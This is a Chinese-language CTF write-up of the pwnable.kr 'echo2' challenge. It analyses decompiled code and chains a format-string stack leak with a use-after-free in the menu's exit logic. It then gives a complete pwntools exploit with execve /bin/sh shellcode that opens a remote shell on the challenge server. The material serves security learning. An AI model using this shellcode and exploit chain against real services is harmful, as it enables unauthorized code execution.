前言
这道题和上一题主逻辑一样,主要是漏洞不一样了,这道题考察格式化支付串漏洞和堆的释放后重用漏洞。
分析
先分析反编译代码1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56int __cdecl main(int argc, const char **argv, const char **envp)
{
int *v3; // rsi@1
_QWORD *v4; // rax@1
int v6; // [sp+Ch] [bp-24h]@1
_QWORD v7[4]; // [sp+10h] [bp-20h]@1
setvbuf(stdout, 0LL, 2, 0LL);
setvbuf(stdin, 0LL, 1, 0LL);
o = malloc(0x28uLL);
*((_QWORD *)o + 3) = greetings;
*((_QWORD *)o + 4) = byebye;
printf("hey, what's your name? : ", 0LL);
v3 = (int *)v7;
__isoc99_scanf("%24s", v7);
v4 = o;
*(_QWORD *)o = v7[0];
v4[1] = v7[1];
v4[2] = v7[2];
id = v7[0];
getchar();
func[0] = (__int64)echo1;
qword_602088 = (__int64)echo2;
qword_602090 = (__int64)echo3;
v6 = 0;
do
{
while ( 1 )
{
while ( 1 )
{
puts("\n- select echo type -");
puts("- 1. : BOF echo");
puts("- 2. : FSB echo");
puts("- 3. : UAF echo");
puts("- 4. : exit");
printf("> ", v3);
v3 = &v6;
__isoc99_scanf("%d", &v6);
getchar();
if ( (unsigned int)v6 > 3 )
break;
((void (__fastcall *)(const char *, int *))func[(unsigned __int64)(unsigned int)(v6 - 1)])("%d", &v6);
}
if ( v6 == 4 )
break;
puts("invalid menu");
}
cleanup();
printf("Are you sure you want to exit? (y/n)", &v6);
v6 = getchar();
}
while ( v6 != 121 );
puts("bye");
return 0;
}
1 | __int64 echo2() |
1 | __int64 echo3() |
程序这次只实现了echo2和echo3函数。分析可以发现,echo2函数中有格式化字符串漏洞。利用这个漏洞可以读写任意8字节内存。开始想得利用方式是向v7变量(就是要输入的名字)写shellcode然后通过该漏洞改写返回地址跳转到该处执行,但是实际上栈地址是64位的想一次写入64位的整数到内存用时太长,特别是在题目平台更长。所以这种方法并不可取。
另一处漏洞需要echo3函数配合main函数里的一处逻辑缺陷来制造uaf漏洞。仔细分析main函数发现,如果在选择4选项退出时,程序会执行cleanup函数,该函数会执行free(o)释放掉先前申请的0x28大小的堆空间。接下来程序又会询问是否退出,否的话又会进入主逻辑执行。很明显的一处释放后重用。而echo3函数中申请了0x20大小的堆空间,根据glibc的堆管理策略,这次申请的堆会直接使用上次释放的堆块,这样如果覆盖了第4个8字节就会导致后面执行(*((void (__fastcall **)(_QWORD))o + 3))(o);时执行任意覆盖的地址了。利用这个漏洞就能解决printf写内存的困难。
整理下利用思路,向v7变量覆盖shellcode,使用prinf的漏洞leak处栈地址然后计算处v7的地址,之后利用uaf漏洞跳转到v7执行。下面是exp1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35from pwn import *
def work(DEBUG):
context(arch='amd64',os='linux',log_level='info')
if DEBUG:
r = process('./echo2')
else:
r = remote('pwnable.kr',9011)
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"# 23 bytes
#context.terminal=['gnome-terminal','-x','sh','-c']
#gdb.attach(proc.pidof(r)[0])
r.recvuntil(' : ')
r.sendline(shellcode)
r.recvuntil('> ')
r.sendline('2')
r.recvuntil('\n')
r.sendline('%10$016lx') # get rbp addr
rbp_addr = int(r.recv(16),16)
v7_addr = rbp_addr-0x20
r.recvuntil('> ')
r.sendline('4')
r.recvuntil('(y/n)')
r.sendline('n\n3\n'+'a'*24+p64(v7_addr))
r.recvuntil('> ')
r.sendline('3')
r.interactive()
work(False)
1 | root@1:~/桌面/test$ python 1.py |
另外注意这是linux的x64环境下,printf的利用需要考虑前6个参数是寄存器传递的,要计算好。
总结
两个漏洞的配合最后拿下shell,很爽。
